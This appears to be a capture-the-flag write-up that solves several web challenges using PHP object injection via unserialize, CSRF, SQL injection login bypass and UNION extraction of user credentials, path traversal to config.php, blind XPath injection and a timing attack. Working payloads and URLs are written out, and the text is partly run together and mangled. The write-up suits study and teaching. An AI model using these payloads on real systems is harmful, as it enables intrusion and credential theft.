From the source code, it can clearly been seen that the direct user input is being passed to the unserialize function which is a security risk and results in a code execution. It can also be seen that a vulnerable magic method "__destruct" exists in the class named "CreateFile" which exists in the same context (or file) as the unserialize function.http://pastebin.com/raw.php?i=g2NQbr8P
readfile(dirname(__FILE__) . '/' . $this->tmpfile);Anybody having basic understanding of the objection injection vulnerability would know that he can set the values of the class properties according to his will by exploiting the "unserialize" function via input. Thus, we can set the value of "tmpfile" which would be the member of the current class instance.
ss O:10:"CreateFile":1:{s:7:"tmpfile";s:15:"unserialize.php";}For anyone (not familar with serialization), here is the code I wrote to generate this payload.
http://pastebin.com/raw.php?i=FkUFveGpA "KEY" was defined in the source code of unserialize.php.
And the credentials of a user account were also given.Hint: It's awesome when other people do things for you, isn't it?;)
The simulation of this hint, so the biggest part of this challenge is at "fake_user.php" file
/sendmoney.php?frommemberID=99999&memberID=1&member=John Smith&ammount=5I tried to tamper the "frommemberID" parameter but the result was not a success. It seemed like the donation page was checking whether the "frommemberID" value matches with that of currently logged in user. The resulting page had this message:
So you want to steal money?? This is not the correct way!Then I remembered the hint i.e. fake_user.php. That page was a user simulator. It also had other (a little too much) information. Here is the information which was mentioned there:
Welcome CSRF Master!Below this text, was a form which had a field to input the URL which victim would visit. To cut to the chase, the donation URL was meant to be submitted in the form on "fake_user.php" page. So I tested it by pasting the same URL that I had tried directly earlier and here was the result:
As you already know, the donation form is vulnerable to CSRF.
You also know, that to become the richest in the bank and win the gorgeous prize you must steal some money from all the members in the bank.
Hey, not too much...max $5 (the donation budget)!
We know, and you too, that to do a CSRF attack we need a victim that follows our links.
Well, to simplify we have made the following form.
This form simulate a user logged in his members area that clicks on a given link.
http://pastebin.com/raw.php?i=QbXDbJhpSo after executing the script, I checked the balance page and this was the result:
First I thought of extracting the admin username and password from the database; but I figured that was unnecessary if the authentication page could be bypassed with good old "x' or 'x'='x".Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'g00n' LIMIT 0,1' at line 5
/login.php?username=x' or 'x'='x&password=x' or 'x'='x
The result that this script generated can be seen in the screenshot below.http://pastebin.com/raw.php?i=WfWv4zKf
This challenge has more than 150 solutions, but are you able to find the one that starts with «#? If yes, give me the MD5 of that value!
From this line, it was understood that the username was "admin.http://pastebin.com/raw.php?i=7kC5cvjh
The next line in the JS code told that the password length should be 7.if(document.getElementById("utb").value=="admin")
if(document.getElementById("ptb").value.length!=7)Now comes the interesting part. It can be seen in the JS code that an "if" statement is used to verify the entered password which has six conditions combined with logical AND (&&) operator. So I analyzed the first condition this way.
document.getElementById("ptb").value.charCodeAt(0) + document.getElementById("ptb").value.charCodeAt(1)==206It's worth mentioned here that the JavaScript "charCodeAt" function returns the Unicode value of the character at the specified index in a string.
document.getElementById("ptb").value.charCodeAt(1) + document.getElementById("ptb").value.charCodeAt(2) == 201This condition says that the Unicode values of the first and second characters of our password should be equal to 201.
So I just used the JavaScript "fromCharCode" function which converts Unicode values into characters to calculate the password and then its MD5 hash.
- 171
- 35
- 166
- 18
- 159
- 21
- 177
http://pastebin.com/raw.php?i=FU1wsPXwHere is the output:
0d6162bd63d6802283fa0c16514dc271So this MD5 hash was the flag for this challenge.
/about.php?a=industrializationAfter some attempts, I discovered that a config file (config.php) existed in a directory named "config" which was located in the parent directory of current location. So I simply used the following URL to read the contents of config file:
/about.php?a=../config/config.phpThe output said: "Ops, where is the salt?! Yes it is here...."
/beer.php?id=1' union select 1,CONCAT_WS(CHAR(32,58,32),id,name,surname,username,password),3 from users where name="kelly" and surname="green" and 'x'='xHere is the output:
22 : Kelly : Green : S0ZH8BR22J5 : UzA5T05UWTRkZnNhNzgwZnNkNmI3OGY2YmRzNmFmdDg3NmFzZDY1OGE=So after entering this hash, the final stage was unlocked.
As you can see, the dbms is MySQL. In this dbms the comments on tables are stored into the INFORMATION_SCHEMA db, inside the table TABLE.This hint made pretty obvious that the encoding or encryption algorithm was stored in the table comments. So I used the following query to extract the contents of the comment of table "users".
/beer.php?id=1' union select 1,table_comment,3 from information_schema.tables where table_schema=database() and table_name="users" and 'x'='xHere is the output:
password = base64(base64(password) + salt)So I had the salt which I extracted in first stage and I had the password hash which I extracted in the second stage. And I had this algorithm. It took only a few seconds to decode the hash and get its plain-text.
Your goal: find the secret hidden among the information sent by a special customer.This challenge had a small PHP application for a restaurant website. Two of the total three pages had nothing of a pen-tester's interest but the third page had a form for seat reservation. It has had a link to another page to check the status of a reservation by providing email and phone.
Negative:URL: /checkreservation.phpPOST data: phone=999-9999-9999&email=t3hg00n@yahoo.com' and '1'='1
Later I realized I could send the same parameters in GET request as well (not important but makes things a bit easier). Anyway, I started with exploiting it manually by using the xpath's "substring" function but soon I realized that it was going take an eternity this way. So I tried to use a python tool named "xcat". It worked but it was so slow that it took about 30 minutes to extract the information of first user in the document but the secret was not stored in the information of first user. What a disappointed that was! And it reached the 4th user, the session was expired; but the secret was not yet found. But it did help because now I knew the element names and I figured which element contained the required secret message. This was the structure of the XML document:URL: /checkreservation.phpPOST data: phone=999-9999-9999&email=t3hg00n@yahoo.com' and '1'='2
http://pastebin.com/raw.php?i=kEQdcGF7So I wrote a little PHP script to extract only the text of "info" element which I believed contained the secret. So first I manually discovered the length of the text in "info" element and then used the script to extract the contents. I started from second user as I already knew that the info of first user didn't have the required secret and found the secret in the info of 7th user.
http://pastebin.com/raw.php?i=REiFeShxHere is the output it generated:
URL: /index.phpAnd here is the resulting page:
POST data: password=test
URL: /index.php?debugAt first the result looked exactly the same. But after checking the source, I discovered that that was some addition content in the result; it was an HTML comment which can be seen in the screenshot below.
POST data: password=test
When I changed the letter 't' to something else, the time again became zero. I tried all characters on the keyboard and the time remained zero. After putting back 't' the time was again 0.1. At this point, I figured that the first letter of the password might be 't' because it's getting passed through checks and there must be some processing going on on the valid characters which takes some time hence the increment in time. So after that, I added one letter after 't' and tried password=ta but the time remained same i.e. 0.1. So once again I replaced 'a' with every character on my keyboard one after one and when finished upper and lower-case alphabets, I inputted password=t1 and this was the result:password=t
http://pastebin.com/raw.php?i=HkFCU2K6It was a little fun coding this one. Here is the output it generated:
Click to Open Code Editor